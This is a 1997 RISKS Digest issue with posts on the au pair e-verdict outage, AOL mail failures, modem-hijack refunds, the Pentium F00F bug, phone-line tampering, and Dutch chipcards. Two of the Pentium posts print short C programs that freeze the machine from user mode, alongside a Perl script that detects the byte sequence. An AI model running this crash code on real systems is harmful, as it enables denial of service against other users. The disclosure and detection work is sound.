precedence: bulk

precedence: bulk
Subject: RISKS DIGEST 19.45

RISKS-LIST: Risks-Forum Digest Tuesday 11 November 1997 Volume 19 : Issue 45

FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

***** See last item for further information, disclaimers, caveats, etc. *****

Contents:
The "au pair" murder case and the Internet (Steve Bellovin, Thomas Dzubin)
Law enforcement databases and the Internet (Steve Bellovin)
AOL out again on Monday (Ed Fischer)
Hijacked surfers get credits and refunds (Stevan Milunovic)
New Pentium flaw (Chuck Weinstock, Torsten Hilbrich, Steven O. Siegfried)
Recent Pentium opcode bug like Monoclonal Agriculture (Cary B. O'Brien)
Phone company lets anyone change lines (Ray Todd Stevens)
The RISKS of the multi-functional chipcard (Geert Jan van Oldenborgh)
Technology and Privacy: The New Landscape, Agre and Rotenberg, eds. (PGN)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Mon, 10 Nov 1997 13:11:48 -0500
From: Steve Bellovin <[email protected]>
Subject: The "au pair" murder case and the Internet

In the so-called "au pair" murder case, the judge decided to release his
opinion over the Internet. Three problems popped up.

The first was authentication -- how were the news media to know that it was
indeed the authentic opinion e-mailed to them? Apparently, the press itself
raised that issue, showing welcome awareness of the problem. While a
digital signature is the obvious answer, the judge in question doesn't use
computers much, and didn't have the proper facilities. Instead, a plaintext
password -- "authenticator", according to one news report -- was used:
"Facts are stubborn things".

The second problem is well-known to Web junkies -- as the scheduled hour
approached, the Web sites that were to carry the opinion became overloaded,
as lots of people pounded on them repeatedly.

The final problem was the most mundane -- a minute before the scheduled
time, a power outage in the neighborhood took out his ISP. Everyone had
to rely on paper copies.

[Judge Zobel clicked his "send" button on his laptop at exactly 10:00
a.m. EST. A local power failure in Brookline, Massachusetts, prevented
the e-mail from going out until 11:02, according to an item from *The
New York Times*, 11 Nov 1997. See the next item. PGN]

------------------------------

Date: Mon, 10 Nov 1997 13:19:55 -0800 (PST)
From: Thomas Dzubin <[email protected]>
Subject: The "au pair" murder case and the Internet

Reference:
http://www.cnn.com/US/9711/10/au.pair.internet/index.html
(link valid as of Monday Nov 11 1997 @ 2pm CST)

Judge Zobel was planning on delivering his decision on the Louise Woodward
"Au Pair" case via the World Wide Web ...trouble is, his Internet Service
Provider lost power at the exact time that he has trying to deliver his
much-anticipated "E-verdict".

The cause? Standard RISKS fare:

A couple of Boston Edison Electric workers in a manhole outside the ISP's
building disconnected the power for the first time since 1994. Normally,
Boston Edison notifies companies of work in advance so an emergency
generator could be brought in, but there was no warning or notification in
this situation.

Thomas Dzubin, Network Analyst. Saskatoon, Calgary, & Vancouver CANADA

------------------------------

Date: Sat, 08 Nov 1997 19:33:36 -0500
From: Steve Bellovin <[email protected]>
Subject: Law enforcement databases and the Internet

The AP reported today that a crime victim's advocacy group is posting the
names of soon-to-be-paroled violent inmates to a Web site. (Such
information has always been public record.) Their intent is to encourage
public comment on the particular cases.

By chance, there was another story today about the hardships being suffered
by a woman who was mistakenly identified as a child molester in letters sent
to her neighbors. Seems that the police felt that they were under no
obligation to check out the data supplied to them by the convicts.

And me? Well, I'm just odd enough to see a link between the two stories.

[Aw, shucks, any self-respecting RISKS reader might. PGN]

------------------------------

Date: Mon, 3 Nov 1997 23:40:53 -0500 (EST)
From: [email protected]
Subject: AOL out again on Monday

America Online suffered a follow-up mail outage this morning (Monday), when
users could not retrieve or send mail. Moreover, an apparent software
glitch caused the AOL client to lock up for users who had pending incoming
mail which contained attachments. The user would get a message, "Sorry, we
cannot download files at this time," which would repeat every 2-3 seconds
until the user terminated the AOL software. In my case, using AOL on
Windows, that meant killing the program from the Windows task list --
nothing less was effective.

I became aware of this latest outage around 9am. I discovered it was over
around 11am. I'm not sure of its exact duration.

Edward Fischer, Director, Information Systems, Post Newsweek Stations, Inc.
3 Constitution Plaza, Hartford, Conn. 06103 [email protected] 860-493-6530

------------------------------

Date: Tue, 04 Nov 1997 16:21:35 -0800
From: [email protected] (Stevan Milunovic)
Subject: Hijacked surfers get credits and refunds

http://www.techweb.com/wire/news/1997/11/1104hijack.html

The Federal Trade Commission announced on 4 Nov 1997 that more than 38,000
consumers will get credits or refunds totaling $2.74 million for telephone
charges they unknowingly incurred when their computer modems were reportedly
hijacked and routed to expensive international numbers, in the aftermath
of the Moldova scam (RISKS-18.84, 87, and 19.05). [PGN Stark Abstracting.
Someone got Roldova?]

------------------------------

Date: Tue, 11 Nov 1997 16:39:41 -0500
From: Chuck Weinstock <[email protected]>
Subject: New Pentium flaw

To summarize, according to today's *Wall Street Journal*:

The Pentium and Pentium MMX chips apparently can be halted by a single,
unprotected, instruction. Over 200 million computers with these chips are
expected to be deployed by year-end. My favorite quote from the article is
by Linley Gwennap, editor of *Microprocessor Report* in Sunnyvale, who says
that "most PC users shouldn't be overly concerned since they would only be
affected if they were the target of a malicious attack."

My second most favorite quote came from Tom Waldrop of Intel in Santa Clara
who "confirmed that someone with malicious intent could exploit the flaw to
cause a system to crash. But a hacker would have to have an ability to send
programs to a computer in machine code, rather than the conventional
computer languages that most programmers use." [We all know how hard that
is...actually maybe these days it is, can we count on the fact that few
people know how to write machine code these days?]

Chuck Weinstock

------------------------------

Date: 09 Nov 1997 09:26:39 +0100
From: Torsten Hilbrich <[email protected]>
Subject: New Pentium flaw

Yesterday (Nov, 8) I found the following information on the news-ticker
page of the German Heise-Verlag (shortened to the essential information):

> The Pentium in standard and MMX version halts on execution of the
> instruction:
> F0 0F C7 C8
> This code sequence works independent of any memory protection of the
> operating system.

I was able to reproduce this bug on a Pentium 133 system with the following
operating systems: DOS, Windows 95, Linux 2.0.31, and FreeBSD 2.2.x.

I don't know about PentiumPro and Pentium II.

The risk? Every pentium based server with user access for executing
programs can be crashed using this code sequence. Not to mention Trojan
Horses or Active-X controls.

Here is an example program:

unsigned char hang[] = { 0xf0, 0x0f, 0xc7, 0xc8 };

int main()
{
void (*kill)();
kill = hang;
kill();
/* return can be omitted as there is none */
}

More information and example programs for various operating systems
can be found on http://www.ccc.de

Torsten Hilbrich

[Also noted by Jeff Anderson-Lee <[email protected]>
citing an item from Peter Curran in comp.security.unix, 7 Nov 1997. PGN]

------------------------------

Date: Mon, 10 Nov 1997 01:07:34 -0600 (CST)
From: "Steven O. Siegfried" <[email protected]>
Subject: New Pentium flaw

New Intel Pentium risk: user mode program locks up system

The following program, when compiled and run in __USER__ mode on any Pentium
(reported as MMX or not, don't know about Pentium II yet) will lock-up the
system.

> char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
> main ()
> {
> void (*f)() = x;
> f();
> }

Any user can execute this program at the lowest level of security provided by
the following operating systems: OS/2, NT, W95, Linux.

When I tried it, I could _only_ recover by power-cycling my box.

The following perl script, courtesy of Sam Trenholme via the security
mailing list at Redhat Software is reported to find _all_ occurrences of
this code sequence on systems running Linux. (It found my bomb program
after I used it to kill my system as a test.) It can probably be adapted
for use on other operating systems.

> #!/usr/bin/perl
> # Source: Sam Trenholme via [email protected] mailing list.
> # There is no known software fix to the F0 0F C7 C8 bug at this time.
> # usage: $0 dir
> # Where dir is the directory you recursively look at all programs in
> # for instances of the F0 0F C7 C8 sequence.
> # This script will search for programs with this sequence, which will
> # help sysadmins take appropriate action against those running such
> # programs.
> # This script is written (but has not been tested) in Perl4, to
> # insure maximum compatibility .
> sub findit {
> local($dir,$file,@files,$data) = @_;
> undef $/;
> if(!opendir(DIR,$dir)) {
> print STDERR "Can not open $dir: $!\n";
> return 0;
> }
> @files=readdir(DIR);
> foreach $file (@files) {
> if($file ne '.' && $file ne '..') {
> if( -f "$dir/$file" && open(FILE,"< $dir/$file")) {
> $data=<FILE>;
> if($data =~ /\xf0\x0f\xc7\xc8/) {
> print "$dir/$file contains F0 0F C7 C8\n";
> }
> } elsif( -d "$dir/$file") {
> &findit("$dir/$file");
> }
> }
> }
> }
> $dir = shift || '/home';
>
> &findit($dir);

Basically, there's no protection from this. Adjust your execution of downline
loaded absolutes accordingly.

Steve Siegfried [email protected] [email protected]

------------------------------

Date: Sat, 8 Nov 1997 12:06:42 -0500 (EST)
From: "Cary B. O'Brien" <[email protected]>
Subject: Recent Pentium opcode bug like Monoclonal Agriculture

[...] Once again I am reminded of the parallels between nearly complete
market domination by a hardware or software product, and the risks of
monoclonal agriculture (*).

In either case a flaw (be it a hardware error, software bug, or
susceptibility to a strain of bacteria or virus) has the potential to
cripple an entire industry, with serious sociological consequences. (cf.,
the Irish Potato Famine).

To me, at least, these parallels reinforce the importance of the
government's responsibility to prevent monopolistic activity on the
part of corporations. Loss of technological diversity is nearly as
bad as the loss of genetic diversity (although far easier to reverse).

Cary O'Brien

(*) By this I mean when a majority of the farms grow genetically
identical products.

------------------------------

Date: Sat, 1 Nov 1997 12:02:56 +0000
From: "Ray Todd Stevens" <[email protected]>
Subject: Phone company lets anyone change lines

I am the person in charge of the phone lines to the modem pool for an ISP,
and recently ran across an interesting problem. I had changed all of the
lines to the modems to be incoming only, and no long distance service
available. Several of the lines had this attribute removed. The reason was
"well someone from your company had to have called in and ordered this".

The risk is obvious. While we believe that the modems are also set to only
allow incoming calls, I am not looking forward to the next phone bill.

Ray Todd Stevens, Senior Consultant, Stevens Services, R.R. # 14 Box 1400
Bedford, IN 47421 (812) 279-9394 [email protected]

------------------------------

Date: Tue, 11 Nov 1997 12:26:40 +0100 (MET)
From: Geert Jan van Oldenborgh <[email protected]>
Subject: The RISKS of the multi-functional chipcard

One of the main selling points of the chipcards with which most
dutch(wo)men have been equipped was their multi-functional,
well-nigh pan-functional nature. The little processor could handle
electronic money, medical info, educational records, train tickets,
anything. The current batch is bi-functional: an electronic wallet
and a telephone card. The risks of this combination are already
obvious: the other day I found a "wallet" in the payphone with
fl 99,46 (US$50) in it.

Geert Jan van Oldenborgh, Holland
[email protected], http://www.xs4all.nl/~gjvo/

------------------------------

Date: Sun, 9 Nov 97 10:57:10 PST
From: "Peter G. Neumann" <[email protected]>
Subject: Technology and Privacy: The New Landscape, Agre and Rotenberg, eds.

Technology and Privacy: The New Landscape
Edited by Philip E. Agre and Marc Rotenberg
MIT Press, 1997, 325+vi pp.
ISBN 0-262-01162-x

"The essays in this book provide a new conceptual framework for analyzing
and debating privacy policy and for designing and developing information
systems. The authors are international e perts in the technical, economic,
and political aspects of privacy; the book's particular strengths are its
synthesis of these three aspects and its treatment of privacy issues in
Canada and Europe as well as in the United States."

The contributors include Phil Agre, Victoria Bellotti, Colin J. Bennett,
Herbert Burkert, Simon G. Davies, David H. Flaherty, Robert Gellman, Viktor
Mayer-Schoenberger, David J. Phillips, and Rohan Samarajiva. The chapters
appear alphabetically, and can be read either consecutively or in any order
of your choice. But you should begin with Phil Agre's introduction, which
beautifully threads the entire book together.

This is a remarkably comprehensive and provocative collection of essays
concerning topics that are familiar to readers of the Risks Forum and the
Privacy Forum Digest. The analysis is generally penetrating and
informative, and fundamental to the interactions and tensions between the
steadily advancing information technology and the corresponding risks to
privacy.

------------------------------

Date: 1 Apr 1997 (LAST-MODIFIED)
From: [email protected]
Subject: Abridged info on RISKS (comp.risks)

The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
if possible and convenient for you. Or use Bitnet LISTSERV. Alternatively,
(via majordomo) DIRECT REQUESTS to <[email protected]> with one-line,
SUBSCRIBE (or UNSUBSCRIBE) [with net address if different from FROM:] or
INFO [for unabridged version of RISKS information]
=> The INFO file (submissions, default disclaimers, archive sites, .mil/.uk
subscribers, copyright policy, PRIVACY digests, etc.) is also obtainable from
http://www.CSL.sri.com/risksinfo.html ftp://www.CSL.sri.com/pub/risks.info
The full info file will appear now and then in future issues. *** All
contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to [email protected] with meaningful SUBJECT: line.
=> ARCHIVES are available: ftp://ftp.sri.com/risks or
ftp ftp.sri.com<CR>login anonymous<CR>[YourNetAddress]<CR>cd risks
[volume-summary issues are in risks-*.00]
[back volumes have their own subdirectories, e.g., "cd 18" for volume 18]
or http://catless.ncl.ac.uk/Risks/VL.IS.html [i.e., VoLume, ISsue].
The ftp.sri.com site risks directory also contains the most recent
PostScript copy of PGN's comprehensive historical summary of one liners:
get illustrative.PS

------------------------------

End of RISKS-FORUM Digest 19.45
************************